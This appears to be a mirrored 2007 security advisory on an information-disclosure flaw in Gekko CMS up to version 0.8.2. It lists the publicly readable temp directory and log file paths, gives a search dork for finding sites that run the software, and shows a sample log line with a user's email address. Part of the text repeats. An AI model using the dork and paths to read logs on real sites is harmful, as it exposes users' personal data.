Gekko <=0.8.2 (temp directory) Path Disclosure

2007-11-2900:00:00

vulners.com

JSON

Gekko <=0.8.2 (temp directory) Path Disclosure

Download:

http://www.gekkoware.org/

Bug found by JosS / Jose Luis Gуngora Fernбndez

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "Powered by Gekko"

Stop lammer

[*] sensitive directory:

temp/
temp/ip.blacklist
temp/cache/
.temp/logs/

temp/logs/access.log
temp/logs/actions.log
temp/logs/messages.log
temp/logs/warning.log

http://www.example.com/PATH/temp/
http://www.example.com/gekko/temp/

You can see sensitive information of the user [example]:

[09/09/2007 04:10:37] (uid=1) [email protected] [Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070723 Iceweasel/2.0.0.6 (Debian-2.0.0.6-1)]
/modules/blog/actions.php
– blog: created new entry with title 'Semana GNU'

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Gуngora Fernбndez

JSON

Gekko &lt;=0.8.2 &#40;temp directory&#41; Path Disclosure

Gekko <=0.8.2 (temp directory) Path Disclosure

Download:

http://www.gekkoware.org/

Bug found by JosS / Jose Luis Gуngora Fernбndez

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "Powered by Gekko"

Stop lammer

Gekko <=0.8.2 (temp directory) Path Disclosure